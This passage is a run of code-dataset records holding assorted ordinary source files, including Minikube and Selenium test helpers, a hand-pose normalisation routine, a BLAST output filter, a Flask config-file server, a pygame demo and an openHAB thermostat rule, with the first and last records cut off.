Mock(return_value='{\"result\": 0}')\n parser = Mock()\n parser.error.side_effect = SystemExit\n\n common.main_cli(function, parser)\n\n function.side_effect = IOError()\n self.assertRaises(SystemExit, common.main_cli, function, parser)\n\n with patch('sys.stderr', sys.stdout):\n function.side_effect = RuntimeError()\n self.assertRaises(SystemExit, common.main_cli, function, parser)\n\n function.side_effect = KeyboardInterrupt()\n self.assertRaises(SystemExit, common.main_cli, function, parser)\n","sub_path":"iotlabcli/tests/common_parser_test.py","file_name":"common_parser_test.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"497971857","text":"#!/usr/bin/env python\n# -*- coding: utf-8\nimport subprocess\nimport time\nfrom urlparse import urljoin\n\nimport os\nimport requests\nimport yaml\nfrom monotonic import monotonic as time_monotonic\n\nPATIENCE = 30\n\n\nclass Minikube(object):\n kubeconfig = None\n server = None\n client_cert = None\n client_key = None\n api_cert = None\n\n def __init__(self, workdir, driver, k8s_version=None, profile=None):\n path = os.path.join(workdir, \"minikube\")\n if not os.path.exists(path):\n raise MinikubeError(\"Minikube is not installed at %s\" % path)\n self._path = path\n self.kubeconfig = os.path.join(workdir, \"kubeconfig\")\n self._env = os.environ.copy()\n self._env[\"KUBECONFIG\"] = self.kubeconfig\n self._driver = driver\n self._k8s_version = k8s_version\n self._profile = profile\n\n def _set_attributes(self):\n def find_named_item(name, l):\n for item in l:\n if item[u\"name\"] == name:\n return item\n raise MinikubeError(\"Unable to find item matching selected name (%s)\" % name)\n\n with open(self.kubeconfig, \"r\") as fobj:\n config = yaml.safe_load(fobj)\n try:\n context = find_named_item(self._profile, config[u\"contexts\"])[u\"context\"]\n cluster = find_named_item(context[u\"cluster\"], config[u\"clusters\"])[u\"cluster\"]\n self.server = cluster[u\"server\"]\n self.api_cert = cluster[u\"certificate-authority\"]\n user = find_named_item(context[u\"user\"], config[u\"users\"])[u\"user\"]\n self.client_cert = user[u\"client-certificate\"]\n self.client_key = user[u\"client-key\"]\n except KeyError as e:\n raise MinikubeError(\"Unable to read configuration for selected context: %s\" % str(e))\n\n def _api_is_up(self):\n try:\n resp = requests.get(urljoin(self.server, \"version\"),\n cert=(self.client_cert, self.client_key),\n verify=self.api_cert,\n timeout=1)\n except requests.RequestException:\n return False\n return resp.status_code == 200\n\n def start(self):\n extra_params = [\"--keep-context\"]\n if self._k8s_version:\n extra_params.extend((\"--kubernetes-version\", self._k8s_version))\n extra_params.extend(self._driver.arguments)\n running = self._attempt_start(extra_params)\n start = time_monotonic()\n while not running and time_monotonic() < (start + PATIENCE):\n running = self._attempt_start(extra_params)\n if not running:\n raise MinikubeError(\"Gave up starting minikube after %d seconds\" % PATIENCE)\n\n def _attempt_start(self, extra_params):\n self._execute(\"start\", extra_params)\n time.sleep(1)\n self._set_attributes()\n running = self._api_is_up()\n return running\n\n def stop(self):\n self._execute(\"stop\")\n\n def delete(self):\n self._execute(\"delete\", ignore_errors=True)\n\n def _execute(self, operation, extra_params=None, ignore_errors=False):\n cmd = [self._path, operation]\n if extra_params:\n cmd.extend(extra_params)\n if self._profile:\n cmd.extend((\"--profile\", self._profile))\n try:\n subprocess.check_output(cmd, stderr=subprocess.STDOUT, env=self._env)\n except subprocess.CalledProcessError as e:\n if not ignore_errors:\n raise MinikubeError(e, output=e.output)\n\n\nclass MinikubeError(Exception):\n def __init__(self, arg, output=\"\"):\n super(MinikubeError, self).__init__(arg)\n self._output = output\n\n def __str__(self):\n desc = super(MinikubeError, self).__str__()\n if self._output:\n return \"\\n\".join((desc, \"Output from command:\", self._output))\n return desc\n","sub_path":"minikube/minikube.py","file_name":"minikube.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"222165365","text":"import numpy as np\n\n# input data shape should be: (5,4,6,n)\n# return data shape is: (5,4,6,n)\ndef help():\n print('''\n Usage:\n >> import sida.cs228.standardize as std\n >> std.do(data)\n\n The shape of the argument `data` should be: (5,4,6,n), where n can be any integer.\n The meaning of the shape is: 5 fingers, 4 bones, 6 coordinates, n hands.\n The result of `do` function will satisfy those conditions:\n (1) the base of index finger on the origin, \n (2) the tip of the metacarpal bone of the index finger will on the point (0,1,0),\n (3) the tip of the metacarpal bone of the baby finger will also on the x-y plane,\n (4) the tip of the metacarpal bone of the thumb will be on the +z side.\n ''')\n \ndef do(data):\n if len(data.shape)==3:\n data = data.reshape(5,4,6,1)\n \n # input shape (5,4,6) \n # output shape (3,5,4,2)\n def data_to_hand(data, inv=False):\n if not inv:\n assert( data.shape[0] == 5 and data.shape[1] == 4 and data.shape[2] == 6 )\n data = data.reshape(5,4,2,3)\n data = np.moveaxis(data, 3, 0)\n return data\n else:\n assert( data.shape[0] == 3 and data.shape[1] == 5 and data.shape[2] == 4 and data.shape[3] == 2 )\n data = np.moveaxis(data, 0, 3)\n data = data.reshape(5,4,6)\n return data\n\n def get_key_points(data):\n # index finger, metacarpal(palm), base\n finger = 1; bone = 0; is_tip = 0\n point1 = hand[:, finger, bone, is_tip]\n # index finger, metacarpal(palm), tip\n finger = 1; bone = 0; is_tip = 1\n point2 = hand[:, finger, bone, is_tip]\n # baby finger, metacarpal(palm), tip\n finger = 4; bone = 0; is_tip = 1\n point3 = hand[:, finger, bone, is_tip]\n # thumb, metacarpal, tip\n finger = 0; bone = 0; is_tip = 1\n point4 = hand[:, finger, bone, is_tip]\n\n return np.array([point1, point2, point3, point4]).T\n\n def ab(a, b):\n n = np.linalg.norm([a,b])\n #print(a,b)\n if n==0:\n print(\"Error: divide by zero.\")\n #print(np.sum(data[:,:,:]))\n #show.show_hand(data[:,:,:])\n #exit()\n a = a / n\n b = b / n\n return a, b\n\n ret = []\n for index in range(data.shape[-1]):\n hand = data_to_hand(data[:,:,:,index]) #So we have points of a hand, the shape is (3,5,4,2), x-y-z 3 coordinates and 5 fingers each hand, 4 bones each finger, 2 ends of each bone, in total 40 points.\n p1 = get_key_points(hand) # So this is 4 points we want to use to standardize. Those key points should relatively stable, such as the metacarpal bones, which we cannot move them a lot even if we want to. The shape is (3,4), x-y-z 3 coordinates and 4 points.\n # Step 1. Move index finger metacarpal(palm) bone base to origin\n for i in range(3): # move x,y,z axes seperately in this loop\n hand[i,:] = hand[i,:] - p1[i,0]\n\n p1 = get_key_points(hand) # We need to know where those key points after last step.\n\n # Step 3. Rotate index finger metacarpal(palm) bone to +x-y plane\n y,z = ab(p1[1,1], p1[2,1]) # p1[1,1] is the y coordinate and p1[2,1] is the z coordinate, we want to rotate to let them fall into +x-y plane, but we need to normalize them, so no scaling will be introduced in this step. here ab(y1,z1) = y1/norm, z1/norm.\n T_rotate = np.array([\n [ 1, 0, 0],\n [ 0, y, z],\n [ 0,-z, y]\n ])\n hand = np.matmul(T_rotate, hand.reshape(3,-1)).reshape(3,5,4,2)\n p1 = get_key_points(hand)\n\n # Step 4. Rotate index finger metacarpal(palm) bone to +y axis\n x,y = ab(p1[0,1], p1[1,1])\n T_rotate = np.array([\n [y, -x, 0],\n [x, y, 0],\n [0, 0, 1]\n ])\n hand = np.matmul(T_rotate, hand.reshape(3,-1)).reshape(3,5,4,2)\n p1 = get_key_points(hand)\n\n # Step 5. Keep index finger on +y axis, Rotate another bone (baby finger, metacarpal(palm), tip) to +x-y plane\n x,z = ab(p1[0,2], p1[2,2])\n T_rotate = np.array([\n [x, 0, z],\n [0, 1, 0],\n [-z, 0, x]\n ])\n hand = np.matmul(T_rotate, hand.reshape(3,-1)).reshape(3,5,4,2)\n p1 = get_key_points(hand)\n\n # Step 6. Mirror Adjust Left-Right hand, depending on the z value of 4-th point thumb, metacarpal, tip\n if p1[2,3]<0:\n #print(\"mirror\")\n hand[2,:,:,:] = - hand[2,:,:,:]\n\n # Step 7. Normalize scale set index finger metacarpal(palm) bone = 1\n hand = hand/np.linalg.norm(p1[1]-p1[0])\n #print(hand.shape)\n #p1 = get_key_points(hand)\n\n #print(p1)\n ret.append(data_to_hand(hand, inv=True))\n ret = np.array(ret)\n \n data = np.moveaxis(ret, 0, 3)\n return data","sub_path":"sida/cs228/standardize.py","file_name":"standardize.py","file_ext":"py","file_size_in_byte":4892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"626050869","text":"import argparse, fileinput, os\n\n# Script for fixing the wav.scp files\ndef get_args():\n parser = argparse.ArgumentParser(description=\"Replace all wav.scp and wav.scp.bak files with the corrected versions\")\n parser.add_argument(\"--wav-dir\", type=str, required=True,\n help=\"Path to wav directory\")\n args = parser.parse_args()\n return args\n\ndef fix_language(wav_dir, lang):\n files_to_fix = []\n wav_file = os.path.join(wav_dir, lang, \"lists\", \"wav.scp\")\n assert os.path.exists(wav_file), \"No wav file path in {}\".format(wav_file)\n files_to_fix.append(wav_file)\n backup_file = os.path.join(wav_dir, lang, \"lists\", \"wav.scp.bak\")\n if os.path.exists(backup_file):\n files_to_fix.append(backup_file)\n\n for file in files_to_fix:\n with fileinput.FileInput(file, inplace=True) as f:\n for line in f:\n print(line.replace(\"s1513472\", \"s1531206\"), end='')\n\n\ndef main():\n args = get_args()\n wav_dir =args.wav_dir\n\n assert os.path.exists(wav_dir), \"Directory not found in {}\".format(wav_dir)\n os.chdir(wav_dir)\n langs = [ x for x in os.listdir() if len(x) == 2 ]\n print(langs)\n for lang in langs:\n fix_language(wav_dir, lang)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"misc/fix_wav_directory.py","file_name":"fix_wav_directory.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"100664151","text":"import pytest\nfrom pbc.sg.selenium import Grid\n\n\n@pytest.fixture(scope=\"session\")\ndef selenium_precondition():\n grid = Grid()\n grid.download()\n grid.start_hub()\n grid.add_node()\n assert len(grid.send_command('pgrep java')) == 2\n yield grid.client\n grid.close()","sub_path":"pbc/sg/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"359517449","text":"import os\nimport unittest\n\ncash_path = os.path.join(os.getcwd(),'../case')\n\nprint('文件地址:', os.getcwd())\nprint(\"cash_path:\", cash_path)\n\ndiscover = unittest.defaultTestLoader.discover(cash_path,\n pattern=\"Test_*.py\",\n top_level_dir=None)\n# top_level_dir : 这个是顶层目录的名称,一般默认等于None就行了\n\nif __name__ == '__main__':\n runner = unittest.TextTestRunner()\n runner.run(discover)","sub_path":"com/caibo/main/LoadCase.py","file_name":"LoadCase.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"335904612","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nmain.py\n\nCopyleft (C) 2017 Magnus Lindström <gnusd@telia.com>\n\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU Affero General Public License as published by the Free\nSoftware Foundation, either version 3 of the License, or (at your option) any\nlater version.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY\nWARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A\nPARTICULAR PURPOSE. See the GNU Affero General Public License for more details.\n\nYou should have received a copy of the GNU Affero General Public License along\nwith this program. If not, see <http://www.gnu.org/licenses/>.\n\n\"\"\"\n\n# Standard lib\nimport yaml\n\n# Local libs\nfrom log import logging\nimport config.config_db as config_db\nimport database as db\nimport db_manipulation as db_m\nimport data_manipulation as data\nimport w_req\nimport rss_xml\n\n# open the configuration file\nwith open(\"config/config.yaml\", \"r\") as f:\n config = yaml.load(f)\n\n\ndef setup():\n # Creating the tables needed in sqLite\n db.create_table(\"shows\", config_db.shows, config[\"db\"])\n db.create_table(\"songs\", config_db.songs, config[\"db\"])\n\n\ndef init_db():\n # Populating the database for the first time\n # sh_list is a dictionary of all availble show where show number is key and link to page is value\n sh_list = w_req.get_showlist(config[\"url\"])\n # requesting and reading json file from link provieded by sh_list\n w_req.get_json(sh_list, config[\"db\"], config_db.date)\n\n update, new_show, sh_list = data.new_show_list(sh_list, None, new_show=[])\n w_req.get_songlist(new_show, config[\"db\"])\n if config[\"feed_r\"]:\n rss_xml.create_rss_feed(config[\"db\"], True, False)\n if config[\"download_mp3\"]:\n data.download_pod()\n if config[\"feed_l\"]:\n rss_xml.create_rss_feed(config[\"db\"], False, True)\n elif not config[\"download_mp3\"] and not config[\"feed_r\"]:\n rss_xml.create_rss_feed(config[\"db\"], True, False)\n\n\ndef main():\n show = db.select_latest_show(config[\"db\"])\n\n if not show:\n status = db.check_for_tables(config[\"db\"], config[\"ch_table\"])\n logging.debug(status)\n if status:\n init_db()\n else:\n setup()\n init_db()\n\n else:\n sh_list = w_req.get_showlist(config[\"url\"])\n update, new_show, sh_list = data.new_show_list(sh_list, show, config_db.new_show)\n\n logging.debug(\"Update = \" + str(update))\n\n if update:\n w_req.get_json(sh_list, config[\"db\"], config_db.date)\n logging.debug(\"get_json finished.\")\n w_req.get_songlist(new_show, config[\"db\"])\n logging.debug(\"get_songlist finished.\")\n if config[\"feed_r\"]:\n rss_xml.create_rss_feed(config[\"db\"], True, False)\n if config[\"download_mp3\"]:\n data.download_pod()\n if config[\"feed_l\"]:\n rss_xml.create_rss_feed(config[\"db\"], False, True)\n elif not config[\"download_mp3\"] and not config[\"feed_r\"]:\n rss_xml.create_rss_feed(config[\"db\"], True, False)\n\n data.look_for_feeds()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"316041730","text":"print(\"Starting...\")\n\nimport pygame\n\nfrom json import load\nsettings = load(open(\"data/settings.json\"))\n\npygame.init()\nscreen = pygame.display.set_mode((settings[\"resolution\"][\"x\"], settings[\"resolution\"][\"y\"]))\npygame.display.set_caption(\"BaftaYGD\")\n\nclass character:\n def __init__(self, x, y, width, height, velocity):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.velocity = velocity\n\nchar = character(\n x = 100,\n y = 50,\n width = 60,\n height = 60,\n velocity = 5\n)\n\nactive = True\nwhile active:\n pygame.time.delay(10)\n for i in pygame.event.get():\n if i.type == pygame.QUIT:\n active = False\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n char.x -= char.velocity\n if keys[pygame.K_RIGHT]:\n char.x += char.velocity\n if keys[pygame.K_UP]:\n char.y -= char.velocity\n if keys[pygame.K_DOWN]:\n char.y += char.velocity\n pygame.draw.rect(screen, (255, 0, 0), (char.x, char.y, char.width, char.height))\n pygame.display.update()\n\npygame.quit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"197648167","text":"#!/usr/bin/env python\n\n#ReParseBlastByTerm by Keith Yamada (19.1.2016)\n#Usage ReParseBlastByTerm.py INPUT.txt OUTPUT.txt OUTPUT_terms.txt TERMS(comma separated and lowercase)\n\n# Takes Blast file with columns: query name, accession, subject name, taxonomy, hsp expect\n# Finds TERMS (e.g. predicted, hypothetical) and removes them to a separate file\n\n\nimport sys\n\nIN = open(sys.argv[1],'r')\nOUT = open(sys.argv[2],'w')\nOUT_terms = open(sys.argv[3],'w')\nTERMS = sys.argv[4].split(',')\n\nheader = IN.readline()\nOUT.write(header) # write column names to output file\nOUT_terms.write(header)\n\nlines = IN.readlines()\nfor line in lines:\n col = line.split('\\t')\n count = 0\n for term in TERMS:\n if col[2].find(term) != -1 or col[2].find(term.capitalize()) != -1 or col[2].find(term.upper()) != -1: # if term found\n count += 1 # increase count\n if count == 0: # if no terms found\n OUT.write(line)\n else:\n OUT_terms.write(line)\n \n \n\n\nOUT.close()\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n","sub_path":"Annotation/blastx2nr/scripts/ReParseBlastByTerm.py","file_name":"ReParseBlastByTerm.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"336180039","text":"# Create a munch object for sci-kit learn\nfrom ingest import *\nfrom munch import *\nimport numpy as np\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import preprocessing\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\n\n##################################################\n#For pulling the data from files (that only contain blobs of text)\n\nfiledata = readfiles(path)\ndef fMunch(dict):\n fm = Munch()\n fm.files = dict.keys()\n fm.text = dict.values()\n fm.target = []\n return(fm)\n\n##################################################\n#For pulling the data from a spreadsheet\n\n# de-duplicate titles - this will mean that each abstract is assigned to a\n# pseudo correct working group\n\nsubset = data[['EventID','ED_Track', 'Abstract Text','Title']]\ndedup = subset.drop_duplicates(subset='Title')\ndf = dedup.dropna()\n\n#Encode targets\nle = preprocessing.LabelEncoder()\nle.fit(df['ED_Track'])\ndf = df.assign(target=le.transform(df['ED_Track']))\n\n#def clean(dfcolumn):\n##Split to train and test\ndftrain, dftest = train_test_split(df, test_size = .2)\n\ndef mkMunch(df):\n m = Munch()\n m.titles = list(df['Title'].values)\n m.text = list(df['Abstract Text'].values)\n m.WG = list(df['ED_Track'].values)\n m.target = list(df['target'].values)\n return(m)\n\n#Polished data set for modeling\ndataset = mkMunch(df)\ntrain = mkMunch(dftrain)\ntest = mkMunch(dftest)\n\nlen(dftrain) + len(dftest)\n\n#WORKSPACE\npath = './data/mini_newsgroups/comp.graphics'\n","sub_path":"wrangle.py","file_name":"wrangle.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"613218587","text":"import PySimpleGUI as sg\r\nimport sys\r\nfrom PIL import Image, ImageDraw\r\n\r\nkey_col = {}\r\n\r\n\r\ndef write_checkbox(csv_inp):\r\n col = []\r\n num = []\r\n\r\n for i in range(23):\r\n col.append([])\r\n num.append(0)\r\n \r\n for j in range(23):\r\n for i in range(len(csv_inp.index)):\r\n if csv_inp.values[i, 0] == j - 11:\r\n col[j] += [[sg.Checkbox(csv_inp.values[i, 1], visible=True, key=f'{j - 11}_{num[j]}')]]\r\n key_col[f'{j - 11}_{num[j]}'] = i\r\n num[j] += 1\r\n\r\n return col, num\r\n\r\ndef test(f, v, n, csv_inp):\r\n coord = []\r\n\r\n for i in range(23):\r\n for j in range(n[i]):\r\n if v[f'{i - 11}_{j}'] == True:\r\n coord.append([csv_inp.values[key_col[f'{i - 11}_{j}'], 2],\r\n csv_inp.values[key_col[f'{i - 11}_{j}'], 3]])\r\n #print(len(coord))\r\n #print('true')\r\n #print(v)\r\n #print(key_col)\r\n \r\n #else:\r\n #print('false')\r\n \r\n try:\r\n base = Image.open(f).convert('RGBA')\r\n rect = Image.new('RGBA', base.size)\r\n draw = ImageDraw.Draw(rect)\r\n\r\n for i in range(len(coord)):\r\n draw.rectangle((coord[i][0], coord[i][1], coord[i][0]+89, coord[i][1]+89), fill=(255,0,0,192))\r\n\r\n base = Image.alpha_composite(base,rect)\r\n base.save('Table/sdvx_18_paint.png')\r\n\r\n sg.popup(' 描画が完了しました', title='成功')\r\n except FileNotFoundError as e:\r\n sg.popup(' 画像ファイルが見つかりません', title='エラー')\r\n #sys.exit(1)\r\n\r\n ","sub_path":"func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"448082428","text":"import turtle\n\ndef dibujarEstrella(t):\n for i in range(5):\n t.forward(100)\n t.left(216)\n\ndef separacion(t):\n t.penup()\n t.forward(350)\n t.right(144)\n t.pendown()\n\nMaki = turtle.Turtle()\nfor i in range(5):\n dibujarEstrella(Maki)\n separacion(Maki)\n","sub_path":"Capitulo 4/EstrellasEnEstrella.py","file_name":"EstrellasEnEstrella.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"152255724","text":"import pandas as pd\nimport numpy as np\n\nfile = pd.read_csv('./saved_models/pred_output/seed60_test/grad_m.csv')\nheader = file.columns\nfile = file.values\nprint(file[:5, :])\nprint(file.shape)\nfile = file.flatten()\nprint(file[:10])\nfile = file.reshape((2, -1))\nprint(file[:, :5])\nprint(file.T)\npd.DataFrame(file.T, columns=header, index=None).\\\n to_csv('./saved_models/pred_output/seed60_test/grad_m.csv', index=False)","sub_path":"chemprop_for_c8/chemprop_revised/testttt.py","file_name":"testttt.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"404327440","text":"# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright © 2012, RedJack, LLC.\n# All rights reserved.\n#\n# Please see the COPYING file in this distribution for license details.\n# ----------------------------------------------------------------------\n\n\nfrom __future__ import absolute_import\n\nfrom buzzy.errors import BuzzyError\n\n\nclass Yaml(object):\n def __init__(self, *args, **kw):\n pass\n\n @classmethod\n def type_name(cls):\n return cls.__name__.lower()\n\n @classmethod\n def from_yaml(cls, yaml, root, *args, **kw):\n self = cls(*args, **kw)\n self.load_yaml(yaml, root)\n self.validate()\n return self\n\n def load_yaml(self, yaml, root):\n pass\n\n def validate(self):\n pass\n\n @classmethod\n def to_yaml(cls, self):\n raise NotImplementedError\n\n\nclass Fields(Yaml):\n def all_fields(self):\n while hasattr(self, \"from_yaml\"):\n if hasattr(self, \"fields\"):\n for tup in self.fields():\n if isinstance(tup, tuple):\n yield tup\n else:\n yield tup, {}\n self = super(self.__class__, self)\n\n def __init__(self, *args, **kw):\n super(Fields, self).__init__(*args, **kw)\n for field, _ in self.all_fields():\n if not hasattr(self, field):\n setattr(self, field, None)\n\n def load_yaml(self, yaml, root):\n # Use an empty set of YAML content if none was given.\n yaml = yaml or {}\n\n # Extract fields from the YAML content.\n for field, options in self.all_fields():\n # Extract the value from the YAML, if present.\n value = None\n if field in yaml:\n value = yaml[field]\n elif \"default\" in options:\n value = options[\"default\"]\n else:\n raise BuzzyError(\"Expected %s in %s\" % (field, self.type_name()))\n\n # Delegate to a custom class, if requested.\n if \"custom\" in options:\n value = options[\"custom\"].from_yaml(value, root)\n\n # Substitute in value references if the field is marked as\n # templated.\n if \"templated\" in options and value is not None:\n value = value % root\n\n setattr(self, field, value)\n\n @classmethod\n def to_yaml(cls, self):\n yaml = {}\n\n # Append fields into the YAML content.\n for field, options in self.all_fields():\n skip = False\n value = getattr(self, field)\n\n if \"custom\" in options:\n value = options[\"custom\"].to_yaml(value)\n\n if \"default\" in options:\n if value == options[\"default\"]:\n # Skip this field if it has the default value.\n skip = True\n\n if not skip:\n yaml[field] = value\n\n return yaml\n\n\nclass Types(Yaml):\n @classmethod\n def from_yaml(cls, yaml, root):\n if isinstance(yaml, dict):\n try:\n type_name = yaml[\"type\"]\n except KeyError:\n raise BuzzyError(\"Missing \\\"type\\\" in %s\" % cls.type_name())\n\n elif isinstance(yaml, str):\n type_name = yaml\n yaml = {\"type\": type_name}\n\n else:\n raise BuzzyError(\"Expected a string or map for %s\" % cls.type_name())\n\n try:\n type_class = cls.types[type_name]\n except KeyError:\n raise BuzzyError(\"Don't know how to process a %s %s\" %\n (type_name, cls.type_name()))\n\n return type_class.from_yaml(yaml, root)\n\n @classmethod\n def to_yaml(cls, self):\n type_class = cls.types[self.type]\n yaml = type_class.to_yaml(self)\n if \"type\" not in yaml:\n raise BuzzyError(\"Missing \\\"type\\\" in %s\" % cls.type_name())\n\n if len(yaml) == 1:\n # If there's only a \"type\" field, render the object as a string\n # instead of a map.\n return yaml[\"type\"]\n else:\n return yaml\n\n\nclass Sequence(Yaml):\n @classmethod\n def from_yaml(cls, yaml, root):\n if isinstance(yaml, list):\n return list(map(lambda x: cls.element_class.from_yaml(x, root), yaml))\n else:\n raise BuzzyError(\"Expected a list for %s\" % cls.type_name())\n\n @classmethod\n def to_yaml(cls, self):\n return map(lambda x: cls.element_class.to_yaml(x), self);\n","sub_path":"buzzy/yaml.py","file_name":"yaml.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"438446148","text":"\"\"\"\nПодключить библиотеку ipaddress\n\nНаписать функцию-классификатор, которая на вход принимает произвольную строку и возвращает словарь:\n- {\"ip\":IPv4Interface()} — для строк вида \" ip address x.x.x.x x.x.x.x\"\n- {“int”:str} — для строк вида \"interface name\"\n- {\"host\":str} — для строк вида \"hostname xxx\"\n- пустой словарь — во всех остальных случаях\n\nАналогично предыдущей работе открыть последовательно каждый конфигурационный файл, прочитать его построчно\n\nКлассифицировать каждую прочитанную строку\n\nСоздать три списка: все IP-адреса, все имена интерфейсов, все имена хостов, вывести на экран\n\n2.2\nСоздайте веб-сервер, который делает следующее:\nПри обращении по “/” — выдаёт краткую справку об использовании\nПри обращении по “/configs” — выдаёт сведения об именах всех хостов, для которых есть кофигурационные файлы (см. работу 1.6)\nПри обращении по “/config/hostname” выдает сведения о всех IP-адресах этого хоста\n\"\"\"\n\nimport re\nimport glob\nfrom flask import Flask, jsonify\n\napp = Flask(__name__)\n\n@app.route('/')\ndef help():\n return \"справка\"\n\n@app.route('/configs')\ndef func_host():\n return jsonify(host_list)\n\n@app.route('/config/<hostname>')\ndef func_ip(hostname):\n for k,v in host_ip.items():\n if k == hostname:\n return jsonify(v)\n\n\nif __name__ == '__main__':\n host_list = []\n host_ip = {}\n for file in glob.glob('d:\\OneDrive\\Docs\\Python_cource\\config_files\\*'):\n ip_list = []\n with open(file) as f:\n for line in f:\n host_name = re.match('hostname ([a-zA-Z0-9-]+)', line)\n ip_mask = re.search('(?<=ip address )(([0-9]{1,3}[.]){3}[0-9]{1,3})',line)\n if host_name:\n host_list.append(host_name.group(1))\n host_temp = host_name.group(1)\n if ip_mask:\n ip_list.append(ip_mask.group(0))\n host_ip[host_temp] = ip_list\n app.run(debug=True)\n\n\n\n\n\n","sub_path":"Lab2.2/web_server.py","file_name":"web_server.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"387947652","text":"from os import listdir\n\nDIR = \"openssl/\"\n\nfor f in listdir(DIR):\n with open(DIR + f) as fp:\n od = fp.read()\n\n nd = \"\"\n for line in od.splitlines(True):\n if \"include <openssl/\" in line:\n tl = line.split(\"include\")[-1].split(\"/\")[-1][:-2]\n line = '#include \"' + tl + '\"\\n'\n nd += line\n\n with open(DIR + f, \"w\") as fp:\n fp.write(nd)\n","sub_path":"include/fix_openssl.py","file_name":"fix_openssl.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"326464090","text":"\"\"\"Example of python module statemachine: https://pypi.org/project/python-statemachine/\"\"\"\r\n\r\n# log:set INFO jsr223.jython.thermostate_mode\r\n# minimum version python-statemachine = 1.0.3\r\n\r\nimport sys\r\nimport os\r\n\r\nfrom core.log import logging, LOG_PREFIX\r\nfrom core.rules import rule\r\nfrom core.triggers import when\r\n\r\nOH_CONF = os.getenv('OPENHAB_CONF')\r\n\r\nsys.path.append(os.path.join(OH_CONF, \"automation/lib/python/personal\"))\r\nfrom thermostat_statemachine import get_state_machine, get_state_machine_list, get_internal_state_machine_state\r\n\r\nlog = logging.getLogger(\"{}.thermostate_mode\".format(LOG_PREFIX))\r\n\r\n\r\ndef set_mode_item(sm, state):\r\n mode_item_name = sm + \"_Mode\"\r\n mode_item = itemRegistry.getItems(mode_item_name)\r\n if mode_item == []:\r\n log.info(\"ModeItem: \" + mode_item_name + \" does not exist\")\r\n else:\r\n events.sendCommand(mode_item_name, state)\r\n\r\n\r\n@rule(\"Thermostat_statemachines_create\",\r\n description=\"initialize the statemachines for thermostats\",\r\n tags=[\"systemstart\", \"thermostats\", \"statemachines\"])\r\n@when(\"System started\")\r\ndef initialize_thermostate_statemachines(event):\r\n \"\"\"setup all statemachines for thermostats\"\"\"\r\n\r\n for oh_item in itemRegistry.getItems():\r\n\r\n if \"Heizung\" in oh_item.getName():\r\n\r\n initialize_thermostate_statemachines.log.debug(\r\n \"handling item: \" + oh_item.getName())\r\n\r\n state_machine = get_state_machine(\r\n oh_item.getName(), initialize_thermostate_statemachines.log)\r\n item_state = oh_item.getState()\r\n\r\n if unicode(item_state, errors='ignore') == \"NULL\":\r\n initialize_thermostate_statemachines.log.debug(\r\n \"skip handling item: \" + oh_item.getName() + \" state is NULL\")\r\n continue\r\n\r\n if \"BoostMode\" in oh_item.getName():\r\n initialize_thermostate_statemachines.log.info(\r\n \"handling BoostMode: \" + oh_item.getName() + \"(\" + str(item_state) + \")\")\r\n state_machine.set_boost(oh_item.getState() == \"ON\")\r\n state_machine.send(\"tr_boost_change\")\r\n if \"ConfigPending\" in oh_item.getName():\r\n initialize_thermostate_statemachines.log.info(\r\n \"handling ConfigPending: \" + oh_item.getName() + \"(\" + str(item_state) + \")\")\r\n state_machine.set_config(oh_item.getState() == \"ON\")\r\n state_machine.send(\"tr_config_change\")\r\n if \"PartyMode\" in oh_item.getName():\r\n initialize_thermostate_statemachines.log.info(\r\n \"handling PartyMode: \" + oh_item.getName() + \"(\" + str(item_state) + \")\")\r\n state_machine.set_boost(oh_item.getState() == \"ON\")\r\n state_machine.send(\"tr_party_change\")\r\n if \"SetPointMode\" in 